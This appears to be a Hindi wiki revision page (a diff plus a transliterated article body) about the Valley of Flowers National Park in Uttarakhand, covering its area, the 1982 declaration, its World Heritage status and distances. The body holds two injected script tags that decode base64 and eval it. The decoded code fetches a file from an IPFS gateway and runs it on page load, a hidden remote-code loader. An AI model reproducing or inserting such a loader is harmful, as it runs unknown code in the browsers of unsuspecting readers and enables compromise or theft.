Difference between revisions of "फूलों की घाटी राष्ट्रीय उद्यान"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " सन " to " सन् ")
Line 4: Line 4:
 
*फूलों की घाटी उद्यान 87.50 वर्ग किमी. क्षेत्र में फैला हुआ है।
 
*फूलों की घाटी उद्यान 87.50 वर्ग किमी. क्षेत्र में फैला हुआ है।
 
*फूलों की घाटी को सन् 1982 ई. में राष्ट्रीय उद्यान घोषित कर दिया गया था।
 
*फूलों की घाटी को सन् 1982 ई. में राष्ट्रीय उद्यान घोषित कर दिया गया था।
*नन्दा देवी राष्ट्रीय उद्यान और 'फूलों की घाटी राष्ट्रीय उद्यान' सम्मिलित रूप से [[विश्व धरोहर स्थल]] घोषित किये गए हैं।
+
*[[नंदा देवी राष्ट्रीय उद्यान]] और 'फूलों की घाटी राष्ट्रीय उद्यान' सम्मिलित रूप से [[विश्व धरोहर स्थल]] घोषित किये गए हैं।
 
*फूलों की घाटी उद्यान [[चमोली ज़िला|चमोली ज़िले]] के अंतिम बस अड्डे से 275 किमी. की दूरी पर है।
 
*फूलों की घाटी उद्यान [[चमोली ज़िला|चमोली ज़िले]] के अंतिम बस अड्डे से 275 किमी. की दूरी पर है।
 
*यहाँ से प्रवेश स्थल की दूरी 13 किमी. है।
 
*यहाँ से प्रवेश स्थल की दूरी 13 किमी. है।
Line 10: Line 10:
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
{{संदर्भ ग्रंथ}}
+
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Revision as of 12:31, 22 March 2012

[[chitr:Valley-Of-Flowers-National-Park.jpg|thumb|250px|phooloan ki ghati rashtriy udyan, uttarakhand]] phooloan ki ghati rashtriy udyan bharat ke uttarakhand rajy mean sthit pramukh rashtriy udyan hai.

  • is udyan ko amataur par sirf 'phooloan ki ghati' ke nam se sambodhit kiya jata hai.
  • phooloan ki ghati udyan 87.50 varg kimi. kshetr mean phaila hua hai.
  • phooloan ki ghati ko sanh 1982 ee. mean rashtriy udyan ghoshit kar diya gaya tha.
  • nanda devi rashtriy udyan aur 'phooloan ki ghati rashtriy udyan' sammilit roop se vishv dharohar sthal ghoshit kiye ge haian.
  • phooloan ki ghati udyan chamoli zile ke aantim bas adde se 275 kimi. ki doori par hai.
  • yahaan se pravesh sthal ki doori 13 kimi. hai.
  • udyan mean ane vale paryatak 3 kimi. lambi tatha adha kimi. chau di phooloan ki ghati mean ghoom sakate haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>